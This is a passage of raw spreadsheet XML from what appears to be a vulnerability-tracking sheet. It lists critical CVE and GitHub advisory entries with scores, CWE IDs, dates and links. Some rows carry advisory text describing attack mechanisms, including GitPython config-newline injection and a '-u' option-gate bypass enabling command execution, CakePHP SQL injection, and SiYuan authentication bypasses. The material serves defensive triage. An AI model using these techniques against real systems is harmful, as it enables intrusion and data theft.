t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85437</t></is></c></row><row r="175"><c r="A175" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B175" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C175" s="5" t="inlineStr"><is><t>CVE-2026-85440</t></is></c><c r="D175" s="5" t="n"><v>9.300000000000001</v></c><c r="E175" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F175" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G175" s="5" t="inlineStr" /><c r="H175" s="5" t="n"><v>0.006</v></c><c r="I175" s="5" t="inlineStr" /><c r="J175" s="5" t="inlineStr" /><c r="K175" s="5" t="inlineStr" /><c r="L175" s="5" t="inlineStr" /><c r="M175" s="5" t="inlineStr" /><c r="N175" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O175" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P175" s="5" t="inlineStr" /><c r="Q175" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R175" s="5" t="inlineStr"><is><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is></c><c r="S175" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85440</t></is></c></row><row r="176"><c r="A176" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B176" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C176" s="5" t="inlineStr"><is><t>CVE-2026-85602</t></is></c><c r="D176" s="5" t="n"><v>9.300000000000001</v></c><c r="E176" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F176" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G176" s="5" t="inlineStr" /><c r="H176" s="5" t="n"><v>0.003</v></c><c r="I176" s="5" t="inlineStr" /><c r="J176" s="5" t="inlineStr" /><c r="K176" s="5" t="inlineStr" /><c r="L176" s="5" t="inlineStr" /><c r="M176" s="5" t="inlineStr" /><c r="N176" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O176" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P176" s="5" t="inlineStr" /><c r="Q176" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="R176" s="5" t="inlineStr"><is><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is></c><c r="S176" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85602</t></is></c></row><row r="177"><c r="A177" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B177" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C177" s="5" t="inlineStr"><is><t>CVE-2026-85672</t></is></c><c r="D177" s="5" t="n"><v>9.300000000000001</v></c><c r="E177" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F177" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G177" s="5" t="inlineStr" /><c r="H177" s="5" t="n"><v>0.015</v></c><c r="I177" s="5" t="inlineStr" /><c r="J177" s="5" t="inlineStr" /><c r="K177" s="5" t="inlineStr" /><c r="L177" s="5" t="inlineStr" /><c r="M177" s="5" t="inlineStr" /><c r="N177" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O177" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P177" s="5" t="inlineStr" /><c r="Q177" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R177" s="5" t="inlineStr"><is><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is></c><c r="S177" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85672</t></is></c></row><row r="178"><c r="A178" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B178" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C178" s="5" t="inlineStr"><is><t>CVE-2026-86121</t></is></c><c r="D178" s="5" t="n"><v>9.300000000000001</v></c><c r="E178" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F178" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G178" s="5" t="inlineStr" /><c r="H178" s="5" t="n"><v>0.006</v></c><c r="I178" s="5" t="inlineStr" /><c r="J178" s="5" t="inlineStr" /><c r="K178" s="5" t="inlineStr" /><c r="L178" s="5" t="inlineStr" /><c r="M178" s="5" t="inlineStr" /><c r="N178" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O178" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P178" s="5" t="inlineStr" /><c r="Q178" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R178" s="5" t="inlineStr"><is><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is></c><c r="S178" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86121</t></is></c></row><row r="179"><c r="A179" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B179" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C179" s="5" t="inlineStr"><is><t>CVE-2026-86190</t></is></c><c r="D179" s="5" t="n"><v>9.300000000000001</v></c><c r="E179" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F179" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G179" s="5" t="inlineStr" /><c r="H179" s="5" t="n"><v>0.003</v></c><c r="I179" s="5" t="inlineStr" /><c r="J179" s="5" t="inlineStr" /><c r="K179" s="5" t="inlineStr" /><c r="L179" s="5" t="inlineStr" /><c r="M179" s="5" t="inlineStr" /><c r="N179" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O179" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P179" s="5" t="inlineStr" /><c r="Q179" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R179" s="5" t="inlineStr"><is><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is></c><c r="S179" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86190</t></is></c></row><row r="180"><c r="A180" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B180" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C180" s="5" t="inlineStr"><is><t>GHSA-9557-234j-7rv9</t></is></c><c r="D180" s="5" t="n"><v>9.300000000000001</v></c><c r="E180" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F180" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G180" s="5" t="inlineStr" /><c r="H180" s="5" t="inlineStr" /><c r="I180" s="5" t="inlineStr" /><c r="J180" s="5" t="inlineStr" /><c r="K180" s="5" t="inlineStr" /><c r="L180" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M180" s="5" t="inlineStr" /><c r="N180" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O180" s="5" t="inlineStr" /><c r="P180" s="5" t="inlineStr" /><c r="Q180" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R180" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-284h-m62q-gf8w. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.59 fails to safely re-serialize multi-line git-config values during write operations, corrupting dormant quoted values into injected directives like core.hooksPath. Attackers can craft config files with embedded newlines that become live git directives after any unrelated GitPython config write, enabling arbitrary code execution via hook invocation.</t></is></c><c r="S180" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-9557-234j-7rv9</t></is></c></row><row r="181"><c r="A181" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B181" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C181" s="5" t="inlineStr"><is><t>GHSA-cw2r-r7mw-j3hc</t></is></c><c r="D181" s="5" t="n"><v>9.300000000000001</v></c><c r="E181" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F181" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G181" s="5" t="inlineStr" /><c r="H181" s="5" t="inlineStr" /><c r="I181" s="5" t="inlineStr" /><c r="J181" s="5" t="inlineStr" /><c r="K181" s="5" t="inlineStr" /><c r="L181" s="5" t="inlineStr"><is><t>pip:gitpython</t></is></c><c r="M181" s="5" t="inlineStr" /><c r="N181" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O181" s="5" t="inlineStr" /><c r="P181" s="5" t="inlineStr" /><c r="Q181" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R181" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-v396-v7q4-x2qj. This link is maintained to preserve external references.

## Original Description

GitPython 3.1.50 fails to recognize joined short-option forms such as -u&lt;value&gt; (the short form of --upload-pack=&lt;value&gt;) when enforcing its default unsafe-option gate. When an application passes attacker-influenced clone options into Repo.clone_from(..., multi_options=..., allow_unsafe_options=False), an attacker can supply -u&lt;helper&gt; to bypass the gate that blocks --upload-pack/-u, causing Git to execute the specified helper command during clone. Fixed in 3.1.51.</t></is></c><c r="S181" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-cw2r-r7mw-j3hc</t></is></c></row><row r="182"><c r="A182" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B182" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C182" s="5" t="inlineStr"><is><t>CVE-2026-66047</t></is></c><c r="D182" s="5" t="n"><v>9.199999999999999</v></c><c r="E182" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F182" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G182" s="5" t="inlineStr" /><c r="H182" s="5" t="n"><v>0.005</v></c><c r="I182" s="5" t="inlineStr" /><c r="J182" s="5" t="inlineStr" /><c r="K182" s="5" t="inlineStr" /><c r="L182" s="5" t="inlineStr" /><c r="M182" s="5" t="inlineStr" /><c r="N182" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O182" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P182" s="5" t="inlineStr" /><c r="Q182" s="5" t="inlineStr"><is><t>CWE-306, CWE-330</t></is></c><c r="R182" s="5" t="inlineStr"><is><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is></c><c r="S182" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66047</t></is></c></row><row r="183"><c r="A183" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B183" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C183" s="5" t="inlineStr"><is><t>CVE-2026-67367</t></is></c><c r="D183" s="5" t="n"><v>9.199999999999999</v></c><c r="E183" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F183" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G183" s="5" t="inlineStr" /><c r="H183" s="5" t="n"><v>0.008</v></c><c r="I183" s="5" t="inlineStr" /><c r="J183" s="5" t="inlineStr" /><c r="K183" s="5" t="inlineStr" /><c r="L183" s="5" t="inlineStr" /><c r="M183" s="5" t="inlineStr" /><c r="N183" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O183" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P183" s="5" t="inlineStr" /><c r="Q183" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="R183" s="5" t="inlineStr"><is><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is></c><c r="S183" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t></is></c></row><row r="184"><c r="A184" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B184" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C184" s="5" t="inlineStr"><is><t>CVE-2026-77635</t></is></c><c r="D184" s="5" t="n"><v>9.199999999999999</v></c><c r="E184" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F184" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G184" s="5" t="inlineStr" /><c r="H184" s="5" t="n"><v>0.003</v></c><c r="I184" s="5" t="inlineStr" /><c r="J184" s="5" t="inlineStr" /><c r="K184" s="5" t="inlineStr" /><c r="L184" s="5" t="inlineStr"><is><t>composer:cakephp/cakephp, composer:cakephp/database</t></is></c><c r="M184" s="5" t="inlineStr"><is><t>5.1.10, 5.2.15, 5.3.7</t></is></c><c r="N184" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O184" s="5" t="inlineStr" /><c r="P184" s="5" t="inlineStr" /><c r="Q184" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R184" s="5" t="inlineStr"><is><t>### Impact
The `FunctionsBuilder::jsonValue($field, $jsonPath)` methods with the Postgres driver is vulnerable to SQL injection if user controlled data is supplied to the `$jsonPath` parameter.

### Patches
5.1.10, 5.2.15, 5.3.7 

### Workarounds
Don't provide user controlled data to these functions/parameters.</t></is></c><c r="S184" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77635</t></is></c></row><row r="185"><c r="A185" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B185" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C185" s="5" t="inlineStr"><is><t>CVE-2026-82067</t></is></c><c r="D185" s="5" t="n"><v>9.199999999999999</v></c><c r="E185" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F185" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G185" s="5" t="inlineStr" /><c r="H185" s="5" t="n"><v>0.003</v></c><c r="I185" s="5" t="inlineStr" /><c r="J185" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K185" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L185" s="5" t="inlineStr" /><c r="M185" s="5" t="inlineStr" /><c r="N185" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O185" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P185" s="5" t="inlineStr" /><c r="Q185" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="R185" s="5" t="inlineStr"><is><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is></c><c r="S185" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t></is></c></row><row r="186"><c r="A186" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B186" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C186" s="5" t="inlineStr"><is><t>CVE-2026-84189</t></is></c><c r="D186" s="5" t="n"><v>9.199999999999999</v></c><c r="E186" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F186" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G186" s="5" t="inlineStr" /><c r="H186" s="5" t="n"><v>0.003</v></c><c r="I186" s="5" t="inlineStr" /><c r="J186" s="5" t="inlineStr" /><c r="K186" s="5" t="inlineStr" /><c r="L186" s="5" t="inlineStr" /><c r="M186" s="5" t="inlineStr" /><c r="N186" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O186" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P186" s="5" t="inlineStr" /><c r="Q186" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R186" s="5" t="inlineStr"><is><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is></c><c r="S186" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84189</t></is></c></row><row r="187"><c r="A187" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B187" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C187" s="5" t="inlineStr"><is><t>CVE-2026-84197</t></is></c><c r="D187" s="5" t="n"><v>9.199999999999999</v></c><c r="E187" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F187" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G187" s="5" t="inlineStr" /><c r="H187" s="5" t="n"><v>0.002</v></c><c r="I187" s="5" t="inlineStr" /><c r="J187" s="5" t="inlineStr" /><c r="K187" s="5" t="inlineStr" /><c r="L187" s="5" t="inlineStr" /><c r="M187" s="5" t="inlineStr" /><c r="N187" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O187" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P187" s="5" t="inlineStr" /><c r="Q187" s="5" t="inlineStr"><is><t>CWE-295, CWE-297, CWE-300</t></is></c><c r="R187" s="5" t="inlineStr"><is><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is></c><c r="S187" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t></is></c></row><row r="188"><c r="A188" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B188" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C188" s="5" t="inlineStr"><is><t>CVE-2026-85427</t></is></c><c r="D188" s="5" t="n"><v>9.199999999999999</v></c><c r="E188" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F188" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G188" s="5" t="inlineStr" /><c r="H188" s="5" t="n"><v>0.004</v></c><c r="I188" s="5" t="inlineStr" /><c r="J188" s="5" t="inlineStr" /><c r="K188" s="5" t="inlineStr" /><c r="L188" s="5" t="inlineStr" /><c r="M188" s="5" t="inlineStr" /><c r="N188" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O188" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P188" s="5" t="inlineStr" /><c r="Q188" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="R188" s="5" t="inlineStr"><is><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is></c><c r="S188" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85427</t></is></c></row><row r="189"><c r="A189" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B189" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C189" s="5" t="inlineStr"><is><t>CVE-2026-85614</t></is></c><c r="D189" s="5" t="n"><v>9.199999999999999</v></c><c r="E189" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F189" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G189" s="5" t="inlineStr" /><c r="H189" s="5" t="n"><v>0.002</v></c><c r="I189" s="5" t="inlineStr" /><c r="J189" s="5" t="inlineStr" /><c r="K189" s="5" t="inlineStr" /><c r="L189" s="5" t="inlineStr" /><c r="M189" s="5" t="inlineStr" /><c r="N189" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O189" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P189" s="5" t="inlineStr" /><c r="Q189" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R189" s="5" t="inlineStr"><is><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is></c><c r="S189" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85614</t></is></c></row><row r="190"><c r="A190" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B190" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C190" s="5" t="inlineStr"><is><t>CVE-2026-9317</t></is></c><c r="D190" s="5" t="n"><v>9.199999999999999</v></c><c r="E190" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F190" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G190" s="5" t="inlineStr" /><c r="H190" s="5" t="n"><v>0.007</v></c><c r="I190" s="5" t="inlineStr" /><c r="J190" s="5" t="inlineStr" /><c r="K190" s="5" t="inlineStr" /><c r="L190" s="5" t="inlineStr" /><c r="M190" s="5" t="inlineStr" /><c r="N190" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O190" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P190" s="5" t="inlineStr" /><c r="Q190" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R190" s="5" t="inlineStr"><is><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is></c><c r="S190" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9317</t></is></c></row><row r="191"><c r="A191" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B191" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C191" s="5" t="inlineStr"><is><t>GHSA-g64v-qqpg-v37h</t></is></c><c r="D191" s="5" t="n"><v>9.199999999999999</v></c><c r="E191" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F191" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G191" s="5" t="inlineStr" /><c r="H191" s="5" t="inlineStr" /><c r="I191" s="5" t="inlineStr" /><c r="J191" s="5" t="inlineStr" /><c r="K191" s="5" t="inlineStr" /><c r="L191" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M191" s="5" t="inlineStr" /><c r="N191" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O191" s="5" t="inlineStr" /><c r="P191" s="5" t="inlineStr" /><c r="Q191" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="R191" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-7j72-f6wg-cxw6. This link is maintained to preserve external references.

## Original Description
SiYuan versions before v3.7.3 contain an authentication bypass vulnerability in publish mode where content-returning endpoints getHeadingChildrenDOM, getHeading*Transaction, and getBacklinkDoc perform no password check despite protecting the primary getDoc endpoint. Anonymous attackers can retrieve full content of password-protected documents by obtaining internal block IDs from reader-accessible endpoints and calling unprotected content endpoints to bypass the password gate.</t></is></c><c r="S191" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-g64v-qqpg-v37h</t></is></c></row><row r="192"><c r="A192" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B192" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C192" s="5" t="inlineStr"><is><t>GHSA-xx34-6cjg-prh8</t></is></c><c r="D192" s="5" t="n"><v>9.199999999999999</v></c><c r="E192" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F192" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G192" s="5" t="inlineStr" /><c r="H192" s="5" t="inlineStr" /><c r="I192" s="5" t="inlineStr" /><c r="J192" s="5" t="inlineStr" /><c r="K192" s="5" t="inlineStr" /><c r="L192" s="5" t="inlineStr"><is><t>go:github.com/siyuan-note/siyuan/kernel</t></is></c><c r="M192" s="5" t="inlineStr" /><c r="N192" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O192" s="5" t="inlineStr" /><c r="P192" s="5" t="inlineStr" /><c r="Q192" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R192" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-v684-q882-jgmq. This link is maintained to preserve external references.

## Original Description
SiYuan before v3.7.4 fails to properly validate publish access for encrypted notebooks, treating them as publicly accessible by default. Anonymous readers can enumerate and retrieve fully decrypted document content from unlocked encrypted notebooks through the publish API without authentication or key material.</t></is></c><c r="S192" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-xx34-6cjg-prh8</t></is></c></row><row r="193"><c r="A193" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B193" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C193" s="5" t="inlineStr"><is><t>CVE-2026-17057</t></is></c><c r="D193" s="5" t="n"><v>9.1</v></c><c r="E193" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G193" s="5" t="inlineStr" /><c r="H193" s="5" t="n"><v>0.004</v></c><c r="I193" s="5" t="inlineStr" /><c r="J193" s="5" t="inlineStr" /><c r="K193" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L193" s="5" t="inlineStr" /><c r="M193" s="5" t="inlineStr" /><c r="N193" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O193" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P193" s="5" t="inlineStr" /><c r="Q193" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R193" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and affect data integrity due to missing authentication for critical functions.</t></is></c><c r="S193" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17057</t></is></c></row><row r="194"><c r="A194" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B194" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C194" s="5" t="inlineStr"><is><t>CVE-2026-17207</t></is></c><c r="D194" s="5" t="n"><v>9.1</v></c><c r="E194" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G194" s="5" t="inlineStr" /><c r="H194" s="5" t="n"><v>0.003</v></c><c r="I194" s="5" t="inlineStr" /><c r="J194" s="5" t="inlineStr" /><c r="K194" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L194" s="5" t="inlineStr" /><c r="M194" s="5" t="inlineStr" /><c r="N194" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O194" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P194" s="5" t="inlineStr" /><c r="Q194" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="R194" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to cause a denial of service and compromise integrity due to a buffer overflow.</t></is></c><c r="S194" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17207</t></is></c></row><row r="195"><c r="A195" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B195" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C195" s="5" t="inlineStr"><is><t>CVE-2026-18664</t></is></c><c r="D195" s="5" t="n"><v>9.1</v></c><c r="E195" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G195" s="5" t="inlineStr" /><c r="H195" s="5" t="n"><v>0.003</v></c><c r="I195" s="5" t="inlineStr" /><c r="J195" s="5" t="inlineStr" /><c r="K195" s="5" t="inlineStr"><is><t>nlnetlabs:nsd</t></is></c><c r="L195" s="5" t="inlineStr" /><c r="M195" s="5" t="inlineStr" /><c r="N195" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O195" s="5" t="inlineStr"><is><t>2026-08-26</t></is></c><c r="P195" s="5" t="inlineStr" /><c r="Q195" s="5" t="inlineStr"><is><t>CWE-284, CWE-697</t></is></c><c r="R195" s="5" t="inlineStr"><is><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is></c><c r="S195" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18664</t></is></c></row><row r="196"><c r="A196" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B196" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C196" s="5" t="inlineStr"><is><t>CVE-2026-19874</t></is></c><c r="D196" s="5" t="n"><v>9.1</v></c><c r="E196" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F196" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G196" s="5" t="inlineStr" /><c r="H196" s="5" t="n"><v>0.007</v></c><c r="I196" s="5" t="inlineStr" /><c r="J196" s="5" t="inlineStr" /><c r="K196" s="5" t="inlineStr" /><c r="L196" s="5" t="inlineStr" /><c r="M196" s="5" t="inlineStr" /><c r="N196" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O196" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P196" s="5" t="inlineStr" /><c r="Q196" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R196" s="5" t="inlineStr"><is><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is></c><c r="S196" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19874</t></is></c></row><row r="197"><c r="A197" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B197" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C197" s="5" t="inlineStr"><is><t>CVE-2026-50152</t></is></c><c r="D197" s="5" t="n"><v>9.1</v></c><c r="E197" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F197" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G197" s="5" t="inlineStr" /><c r="H197" s="5" t="n"><v>0.002</v></c><c r="I197" s="5" t="inlineStr" /><c r="J197" s="5" t="inlineStr" /><c r="K197" s="5" t="inlineStr" /><c r="L197" s="5" t="inlineStr" /><c r="M197" s="5" t="inlineStr" /><c r="N197" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O197" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P197" s="5" t="inlineStr" /><c r="Q197" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="R197" s="5" t="inlineStr"><is><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is></c><c r="S197" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50152</t></is></c></row><row r="198"><c r="A198" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B198" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C198" s="5" t="inlineStr"><is><t>CVE-2026-55511</t></is></c><c r="D198" s="5" t="n"><v>9.1</v></c><c r="E198" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F198" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G198" s="5" t="inlineStr" /><c r="H198" s="5" t="n"><v>0.007</v></c><c r="I198" s="5" t="inlineStr" /><c r="J198" s="5" t="inlineStr" /><c r="K198" s="5" t="inlineStr" /><c r="L198" s="5" t="inlineStr" /><c r="M198" s="5" t="inlineStr" /><c r="N198" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O198" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P198" s="5" 